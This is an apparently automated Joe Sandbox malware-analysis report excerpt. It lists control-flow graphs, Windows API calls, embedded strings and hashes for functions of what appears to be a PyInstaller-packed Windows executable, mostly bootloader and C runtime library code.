                                                                                                                                                                                                                          control_flow_graph 514 7ff641f45c74-7ff641f45ce7 call 7ff641f459a8 517 7ff641f45ce9-7ff641f45cf2 call 7ff641f343d4 514->517 518 7ff641f45d01-7ff641f45d0b call 7ff641f37830 514->518 523 7ff641f45cf5-7ff641f45cfc call 7ff641f343f4 517->523 524 7ff641f45d26-7ff641f45d8f CreateFileW 518->524 525 7ff641f45d0d-7ff641f45d24 call 7ff641f343d4 call 7ff641f343f4 518->525 538 7ff641f46042-7ff641f46062 523->538 528 7ff641f45e0c-7ff641f45e17 GetFileType 524->528 529 7ff641f45d91-7ff641f45d97 524->529 525->523 531 7ff641f45e19-7ff641f45e54 GetLastError call 7ff641f34368 CloseHandle 528->531 532 7ff641f45e6a-7ff641f45e71 528->532 534 7ff641f45dd9-7ff641f45e07 GetLastError call 7ff641f34368 529->534 535 7ff641f45d99-7ff641f45d9d 529->535 531->523 549 7ff641f45e5a-7ff641f45e65 call 7ff641f343f4 531->549 541 7ff641f45e79-7ff641f45e7c 532->541 542 7ff641f45e73-7ff641f45e77 532->542 534->523 535->534 536 7ff641f45d9f-7ff641f45dd7 CreateFileW 535->536 536->528 536->534 546 7ff641f45e82-7ff641f45ed7 call 7ff641f37748 541->546 547 7ff641f45e7e 541->547 542->546 552 7ff641f45ed9-7ff641f45ee5 call 7ff641f45bb0 546->552 553 7ff641f45ef6-7ff641f45f27 call 7ff641f45728 546->553 547->546 549->523 552->553 559 7ff641f45ee7 552->559 560 7ff641f45f29-7ff641f45f2b 553->560 561 7ff641f45f2d-7ff641f45f6f 553->561 562 7ff641f45ee9-7ff641f45ef1 call 7ff641f39dd0 559->562 560->562 563 7ff641f45f91-7ff641f45f9c 561->563 564 7ff641f45f71-7ff641f45f75 561->564 562->538 565 7ff641f46040 563->565 566 7ff641f45fa2-7ff641f45fa6 563->566 564->563 568 7ff641f45f77-7ff641f45f8c 564->568 565->538 566->565 569 7ff641f45fac-7ff641f45ff1 CloseHandle CreateFileW 566->569 568->563 571 7ff641f46026-7ff641f4603b 569->571 572 7ff641f45ff3-7ff641f46021 GetLastError call 7ff641f34368 call 7ff641f37970 569->572 571->565 572->571
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                          • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction ID: 69ea1258de8fc715cee994865935ac02d31da5275dc69634fb2ef91effb7241e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0C1C132B2CA4586EB51FFA8C5902AC37A1FB59B98B015225DF1E977E5DF38E452C300
                                                                                                                                                                                                                          Function 00007FF641F4518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 845 7ff641f4518c-7ff641f451c1 call 7ff641f44898 call 7ff641f448a0 call 7ff641f44908 852 7ff641f451c7-7ff641f451d2 call 7ff641f448a8 845->852 853 7ff641f452ff-7ff641f4536d call 7ff641f39c10 call 7ff641f40888 845->853 852->853 858 7ff641f451d8-7ff641f451e3 call 7ff641f448d8 852->858 865 7ff641f4537b-7ff641f4537e 853->865 866 7ff641f4536f-7ff641f45376 853->866 858->853 864 7ff641f451e9-7ff641f4520c call 7ff641f39c58 GetTimeZoneInformation 858->864 878 7ff641f452d4-7ff641f452fe call 7ff641f44890 call 7ff641f44880 call 7ff641f44888 864->878 879 7ff641f45212-7ff641f45233 864->879 867 7ff641f45380 865->867 868 7ff641f453b5-7ff641f453c8 call 7ff641f3c90c 865->868 870 7ff641f4540b-7ff641f4540e 866->870 872 7ff641f45383 867->872 886 7ff641f453ca 868->886 887 7ff641f453d3-7ff641f453ee call 7ff641f40888 868->887 871 7ff641f45414-7ff641f4541c call 7ff641f44f10 870->871 870->872 876 7ff641f45388-7ff641f453b4 call 7ff641f39c58 call 7ff641f2b870 871->876 872->876 877 7ff641f45383 call 7ff641f4518c 872->877 877->876 882 7ff641f4523e-7ff641f45245 879->882 883 7ff641f45235-7ff641f4523b 879->883 891 7ff641f45259 882->891 892 7ff641f45247-7ff641f4524f 882->892 883->882 889 7ff641f453cc-7ff641f453d1 call 7ff641f39c58 886->889 904 7ff641f453f0-7ff641f453f3 887->904 905 7ff641f453f5-7ff641f45407 call 7ff641f39c58 887->905 889->867 896 7ff641f4525b-7ff641f452cf call 7ff641f497e0 * 4 call 7ff641f41e6c call 7ff641f45424 * 2 891->896 892->891 898 7ff641f45251-7ff641f45257 892->898 896->878 898->896 904->889 905->870
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448EC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                          • Opcode ID: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                          • Instruction ID: 8c87b41562eb635765a79be36bba81775fb47de72bd49f09d5dc3db6a7a024d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97517F32A0C64686E7A1FF21E9811A963E1BB68784F405136EA4DD7AE6DF3CF443C740
                                                                                                                                                                                                                          Function 00007FF641F285A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction ID: 8084565eab56df56823934c87426674299e02a15cbe342ca9b576c64752de490
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0C872A1C68186F7F1BF60B4483A673D0BB84328F440335D96D436D4CF3CD45A8A04
                                                                                                                                                                                                                          Function 00007FF641F218F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 179 7ff641f218f0-7ff641f2192b call 7ff641f23f70 182 7ff641f21bc1-7ff641f21be5 call 7ff641f2b870 179->182 183 7ff641f21931-7ff641f21971 call 7ff641f276a0 179->183 188 7ff641f21977-7ff641f21987 call 7ff641f2f9f4 183->188 189 7ff641f21bae-7ff641f21bb1 call 7ff641f2f36c 183->189 194 7ff641f21989-7ff641f2199c call 7ff641f22760 188->194 195 7ff641f219a1-7ff641f219bd call 7ff641f2f6bc 188->195 193 7ff641f21bb6-7ff641f21bbe 189->193 193->182 194->189 200 7ff641f219d7-7ff641f219ec call 7ff641f34154 195->200 201 7ff641f219bf-7ff641f219d2 call 7ff641f22760 195->201 206 7ff641f21a06-7ff641f21a87 call 7ff641f21bf0 * 2 call 7ff641f2f9f4 200->206 207 7ff641f219ee-7ff641f21a01 call 7ff641f22760 200->207 201->189 215 7ff641f21a8c-7ff641f21a9f call 7ff641f34170 206->215 207->189 218 7ff641f21ab9-7ff641f21ad2 call 7ff641f2f6bc 215->218 219 7ff641f21aa1-7ff641f21ab4 call 7ff641f22760 215->219 224 7ff641f21aec-7ff641f21b08 call 7ff641f2f430 218->224 225 7ff641f21ad4-7ff641f21ae7 call 7ff641f22760 218->225 219->189 230 7ff641f21b1b-7ff641f21b29 224->230 231 7ff641f21b0a-7ff641f21b16 call 7ff641f225f0 224->231 225->189 230->189 233 7ff641f21b2f-7ff641f21b3e 230->233 231->189 235 7ff641f21b40-7ff641f21b46 233->235 236 7ff641f21b48-7ff641f21b55 235->236 237 7ff641f21b60-7ff641f21b6f 235->237 238 7ff641f21b71-7ff641f21b7a 236->238 237->237 237->238 239 7ff641f21b7c-7ff641f21b7f 238->239 240 7ff641f21b8f 238->240 239->240 241 7ff641f21b81-7ff641f21b84 239->241 242 7ff641f21b91-7ff641f21bac 240->242 241->240 243 7ff641f21b86-7ff641f21b89 241->243 242->189 242->235 243->240 244 7ff641f21b8b-7ff641f21b8d 243->244 244->242
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 677216364-3497178890
                                                                                                                                                                                                                          • Opcode ID: bf80d0b8a0de8a6362d56fa7f65a28689fb937646ba708a53e42927df424661c
                                                                                                                                                                                                                          • Instruction ID: 3b6ab993f6dffb2c468912170d2ec60f7662f00a4ea3d6d648ff767d9f0be917
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf80d0b8a0de8a6362d56fa7f65a28689fb937646ba708a53e42927df424661c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271AC31A1C6C685EBA2FB64E5502F923E0FB58784F444131E98DC77DAEF2EE5468B04
                                                                                                                                                                                                                          Function 00007FF641F21440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: b407304f59c8fed8e80953ab1446060df87242f28b87016e8bc065588a071b4b
                                                                                                                                                                                                                          • Instruction ID: 171ffaf35e7d3c65d70412a763a60c2270fbfa00c15cab0ce9641801f6c2caed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b407304f59c8fed8e80953ab1446060df87242f28b87016e8bc065588a071b4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241AE21B0C68281FBA2BB55A9411FA63E0FF54794F484031DA4E87AD6EF3DE5078708
                                                                                                                                                                                                                          Function 00007FF641F211F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 577 7ff641f211f0-7ff641f2124d call 7ff641f2b0a0 580 7ff641f21277-7ff641f2128f call 7ff641f34170 577->580 581 7ff641f2124f-7ff641f21276 call 7ff641f225f0 577->581 586 7ff641f212ad-7ff641f212bd call 7ff641f34170 580->586 587 7ff641f21291-7ff641f212a8 call 7ff641f22760 580->587 593 7ff641f212db-7ff641f212ed 586->593 594 7ff641f212bf-7ff641f212d6 call 7ff641f22760 586->594 592 7ff641f21409-7ff641f2141e call 7ff641f2ad80 call 7ff641f3415c * 2 587->592 608 7ff641f21423-7ff641f2143d 592->608 596 7ff641f212f0-7ff641f21315 call 7ff641f2f6bc 593->596 594->592 603 7ff641f2131b-7ff641f21325 call 7ff641f2f430 596->603 604 7ff641f21401 596->604 603->604 610 7ff641f2132b-7ff641f21337 603->610 604->592 611 7ff641f21340-7ff641f21368 call 7ff641f294e0 610->611 614 7ff641f213e6-7ff641f213fc call 7ff641f225f0 611->614 615 7ff641f2136a-7ff641f2136d 611->615 614->604 616 7ff641f2136f-7ff641f21379 615->616 617 7ff641f213e1 615->617 619 7ff641f2137b-7ff641f21389 call 7ff641f2fdfc 616->619 620 7ff641f213a4-7ff641f213a7 616->620 617->614 625 7ff641f2138e-7ff641f21391 619->625 622 7ff641f213a9-7ff641f213b7 call 7ff641f49140 620->622 623 7ff641f213ba-7ff641f213bf 620->623 622->623 623->611 624 7ff641f213c5-7ff641f213c8 623->624 628 7ff641f213ca-7ff641f213cd 624->628 629 7ff641f213dc-7ff641f213df 624->629 630 7ff641f2139f-7ff641f213a2 625->630 631 7ff641f21393-7ff641f2139d call 7ff641f2f430 625->631 628->614 632 7ff641f213cf-7ff641f213d7 628->632 629->604 630->614 631->623 631->630 632->596
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                          • Opcode ID: aaa6e2f1d8ba90dcc4eddcd4f4e0a7b2b807957a0759b3b30b192466de30692a
                                                                                                                                                                                                                          • Instruction ID: c312a6d2c1767073aede0e2e19b850bd1955c0469c60c5991906d2070224f392
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6e2f1d8ba90dcc4eddcd4f4e0a7b2b807957a0759b3b30b192466de30692a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51BF62A0C68281EBA2BB95A8503FA62D1BB85794F444135ED4DC7BD6EF3DE9038704
                                                                                                                                                                                                                          Function 00007FF641F3E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E19C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E1A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                          • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction ID: 5e78e2612ef6a5baa1b3e86634168ebf7101213be96f47287991743ce728c4d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5418932B1DA0681EB97BB16AD006A662D2BF45BA0F484135DD1DC7BC6EE3DE4478205
                                                                                                                                                                                                                          Function 00007FF641F3AD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 732 7ff641f3ad6c-7ff641f3ad92 733 7ff641f3adad-7ff641f3adb1 732->733 734 7ff641f3ad94-7ff641f3ada8 call 7ff641f343d4 call 7ff641f343f4 732->734 736 7ff641f3b187-7ff641f3b193 call 7ff641f343d4 call 7ff641f343f4 733->736 737 7ff641f3adb7-7ff641f3adbe 733->737 750 7ff641f3b19e 734->750 756 7ff641f3b199 call 7ff641f39bf0 736->756 737->736 739 7ff641f3adc4-7ff641f3adf2 737->739 739->736 742 7ff641f3adf8-7ff641f3adff 739->742 745 7ff641f3ae18-7ff641f3ae1b 742->745 746 7ff641f3ae01-7ff641f3ae13 call 7ff641f343d4 call 7ff641f343f4 742->746 748 7ff641f3ae21-7ff641f3ae27 745->748 749 7ff641f3b183-7ff641f3b185 745->749 746->756 748->749 754 7ff641f3ae2d-7ff641f3ae30 748->754 753 7ff641f3b1a1-7ff641f3b1b8 749->753 750->753 754->746 757 7ff641f3ae32-7ff641f3ae57 754->757 756->750 760 7ff641f3ae59-7ff641f3ae5b 757->760 761 7ff641f3ae8a-7ff641f3ae91 757->761 763 7ff641f3ae5d-7ff641f3ae64 760->763 764 7ff641f3ae82-7ff641f3ae88 760->764 765 7ff641f3ae66-7ff641f3ae7d call 7ff641f343d4 call 7ff641f343f4 call 7ff641f39bf0 761->765 766 7ff641f3ae93-7ff641f3aebb call 7ff641f3c90c call 7ff641f39c58 * 2 761->766 763->764 763->765 769 7ff641f3af08-7ff641f3af1f 764->769 797 7ff641f3b010 765->797 793 7ff641f3aed8-7ff641f3af03 call 7ff641f3b594 766->793 794 7ff641f3aebd-7ff641f3aed3 call 7ff641f343f4 call 7ff641f343d4 766->794 772 7ff641f3af9a-7ff641f3afa4 call 7ff641f42c2c 769->772 773 7ff641f3af21-7ff641f3af29 769->773 785 7ff641f3afaa-7ff641f3afbf 772->785 786 7ff641f3b02e 772->786 773->772 774 7ff641f3af2b-7ff641f3af2d 773->774 774->772 778 7ff641f3af2f-7ff641f3af45 774->778 778->772 782 7ff641f3af47-7ff641f3af53 778->782 782->772 787 7ff641f3af55-7ff641f3af57 782->787 785->786 791 7ff641f3afc1-7ff641f3afd3 GetConsoleMode 785->791 789 7ff641f3b033-7ff641f3b053 ReadFile 786->789 787->772 792 7ff641f3af59-7ff641f3af71 787->792 795 7ff641f3b059-7ff641f3b061 789->795 796 7ff641f3b14d-7ff641f3b156 GetLastError 789->796 791->786 798 7ff641f3afd5-7ff641f3afdd 791->798 792->772 802 7ff641f3af73-7ff641f3af7f 792->802 793->769 794->797 795->796 804 7ff641f3b067 795->804 799 7ff641f3b158-7ff641f3b16e call 7ff641f343f4 call 7ff641f343d4 796->799 800 7ff641f3b173-7ff641f3b176 796->800 801 7ff641f3b013-7ff641f3b01d call 7ff641f39c58 797->801 798->789 806 7ff641f3afdf-7ff641f3b001 ReadConsoleW 798->806 799->797 810 7ff641f3b009-7ff641f3b00b call 7ff641f34368 800->810 811 7ff641f3b17c-7ff641f3b17e 800->811 801->753 802->772 809 7ff641f3af81-7ff641f3af83 802->809 813 7ff641f3b06e-7ff641f3b083 804->813 815 7ff641f3b003 GetLastError 806->815 816 7ff641f3b022-7ff641f3b02c 806->816 809->772 820 7ff641f3af85-7ff641f3af95 809->820 810->797 811->801 813->801 822 7ff641f3b085-7ff641f3b090 813->822 815->810 816->813 820->772 825 7ff641f3b0b7-7ff641f3b0bf 822->825 826 7ff641f3b092-7ff641f3b0ab call 7ff641f3a984 822->826 827 7ff641f3b13b-7ff641f3b148 call 7ff641f3a7c4 825->827 828 7ff641f3b0c1-7ff641f3b0d3 825->828 834 7ff641f3b0b0-7ff641f3b0b2 826->834 827->834 831 7ff641f3b12e-7ff641f3b136 828->831 832 7ff641f3b0d5 828->832 831->801 835 7ff641f3b0da-7ff641f3b0e1 832->835 834->801 837 7ff641f3b11d-7ff641f3b128 835->837 838 7ff641f3b0e3-7ff641f3b0e7 835->838 837->831 839 7ff641f3b0e9-7ff641f3b0f0 838->839 840 7ff641f3b103 838->840 839->840 841 7ff641f3b0f2-7ff641f3b0f6 839->841 842 7ff641f3b109-7ff641f3b119 840->842 841->840 843 7ff641f3b0f8-7ff641f3b101 841->843 842->835 844 7ff641f3b11b 842->844 843->842 844->831
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
